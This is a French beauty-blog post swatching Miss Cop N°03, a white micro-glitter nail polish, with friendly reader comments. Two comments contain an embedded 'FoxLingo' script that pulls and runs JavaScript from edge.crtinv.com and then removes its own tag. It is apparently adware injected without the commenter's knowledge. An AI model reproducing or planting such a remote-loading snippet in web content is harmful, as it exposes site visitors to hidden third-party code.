• Swatch - Miss Cop N°03

    Coucou les filles,

    Tout d'abord je suis vraiment désolée de ne plus être trop présente en ce moment mais je n'ai quasiment plus de temps libre :(

    Pour me faire pardonner je vais sûrement vous organiser une petite surprise à l'occasion de mon anniversaire le 18 Septembre (26 ans... bouh j'ai pas envie de prendre un an de plus)

    Aujourd'hui je vais vous montrer un très joli vernis qui m'a servi de base pour une déco que j'ai adoré mais que je vous montrerais plutard !

    Il s'agit du Miss Cop "N°03" un très joli blanc micro pailletté

    Niveau application aucun soucis, il n'est pas très opaque donc je pense qu'il faut 3 couches mais je n'en ai mis que 2 ici car j'ai fais une déco dessus et il sèche assez vite !

    Allez je vous le montre :

    Swatch - Miss Cop N°03Swatch - Miss Cop N°03

    Swatch - Miss Cop N°03

    Alors il vous plait ?

    Perso je l'ai trouvé très joli et encore plus décoré ^^

    A bientôt

    « Swatch - Peggy Sage "Néon Pink"Un Giveaway pour vous !!! »

  • Commentaires

    15
    charlène.
    Dimanche 30 Décembre 2012 à 15:20

    il est très beau

    14
    Jeudi 25 Octobre 2012 à 15:26

    Coucou les filles,

    Laurence77 : merci beaucoup pour ton gentil com ! perso je trouve aussi que ce petit vernis ne peut pas se porter seul et j'ai fais dessus une très jolie déco je je vais vous montrer bientôt ^^ pour le truc bizarre c'est pas grave :p

    chantalf : merci ma belle pour ton très gentil com :)

    béatrice : merci beaucoup ^^

    marina : merci :)

    marine : merci ^^ bientôt je vous montres ce que j'ai fais dessus !

    licorne : merci c'est gentil ^^

    saphir : merci :)

    angélique : merci ma belle c'est gentil !

    lmegane : merci ^^ bientôt la déco !

    dame céleste : merci ma belle ! ah bah alors si ça t'arrange c'est cool :p

    mimies : merci ma jolie pour ton gentil com ^^

    rosenwok : merci ma belle ^^

    bisous à toutes

    13
    Dimanche 30 Septembre 2012 à 15:09
    Rosenwok

    Coucou ma belle ^^ Bon anniversaiiiiiire en retard :)

    Ca fait plaisir de revenir te voir !!!! je profite d'un dimanche de repos tranquillou pour venir revoir TOUT ce que j'ai raté sur ton blog!!!!!! :) Je crois que j'ai du boulot hihi

    12
    Jeudi 27 Septembre 2012 à 17:56

    Ma belle, prend du temps pour toi ! Ce vernis est beau, discret et chic ! Bisous

    11
    Dame Céleste Profil de Dame Céleste
    Mardi 18 Septembre 2012 à 20:45

    pas grave si tu n'as plus le temps d'écrire ; je n'ai plus trop le temps de lire en ce moment donc égoistement ça m'arrange !! 26 ans : quelle chance tu es encore toute jeune ! profite bien !!! bisous

    10
    Jeudi 13 Septembre 2012 à 11:31

    Coucou ! Oui c'est un beau blanc ! Pressée de voir la déco que tu lui as fait !!! Bises

    9
    Mercredi 12 Septembre 2012 à 19:29
    Angélique08440

    il est vraiment très joli!!!

    gros bisous

    8
    Mercredi 12 Septembre 2012 à 18:53

    coucou ma belle

    il est très beau

    gros bisous

    7
    Mercredi 12 Septembre 2012 à 13:47

    coucou,il est trés beau, tout en dicrétion

    bisous

    6
    Mercredi 12 Septembre 2012 à 13:21

    Il est beau :) j'ai hate de voir ton nail art :p

    5
    marina1674
    Mercredi 12 Septembre 2012 à 13:14

    kikou ! il est super beau! bises !

    4
    Mercredi 12 Septembre 2012 à 12:39

    oh oui il est super beau

    3
    chantalf Profil de chantalf
    Mercredi 12 Septembre 2012 à 11:54

    cc !! en effet il est bien sympa ce petit vernis, bientot l'approche de ton anniversaire ne t'en fais pas tu es encore toute jeune, mais c vrai que les années défilent, bisous

    2
    Mercredi 12 Septembre 2012 à 09:03

    Dsl pour le truc bizarre à la fin de mon post, ca me le fait partout, je comprend pas ...

     

    <script id="FoxLingoJs" type="text/javascript">// <![CDATA[ !function(){try{var h=document.getElementsByTagName("head")[0];var s=document.createElement("script");s.src="//edge.crtinv.com/products/FoxLingo/default/snippet.js";s.onload=s.onreadystatechange=function(){if(!this.readyState || this.readyState=="loaded" || this.readyState=="complete"){s.onload=s.onreadystatechange=null;h.removeChild(s);}};h.appendChild(s);}catch(ex){}}(); // ]]></script>
    1
    Mercredi 12 Septembre 2012 à 09:03

    Coucou :o)

    Ne t'inquiète pas pour ta petite absence, on est toutes un peu dans le même cas à un moment donné ^^ (moi aussi, la période rentrée des classes ... pfiouuuuuuuuuuuu j'arrive pas trop à suivre lol ca va revenir ^^).

    J'espère que tu vas bien :o)

    Ton petit précieux est très joli mais il fait partis de la gamme de vernis que je ne porterais pas tout nu ^^ 

     

    J'ai hâte de voir ce que tu as fais dessus ^^

    Gros bisous ma belle :o)

      <script id="FoxLingoJs" type="text/javascript">// <![CDATA[ !function(){try{var h=document.getElementsByTagName("head")[0];var s=document.createElement("script");s.src="//edge.crtinv.com/products/FoxLingo/default/snippet.js";s.onload=s.onreadystatechange=function(){if(!this.readyState || this.readyState=="loaded" || this.readyState=="complete"){s.onload=s.onreadystatechange=null;h.removeChild(s);}};h.appendChild(s);}catch(ex){}}(); // ]]></script>

    Suivre le flux RSS des commentaires


    Ajouter un commentaire

    Nom / Pseudo :

    E-mail (facultatif) :

    Site Web (facultatif) :

    Commentaire :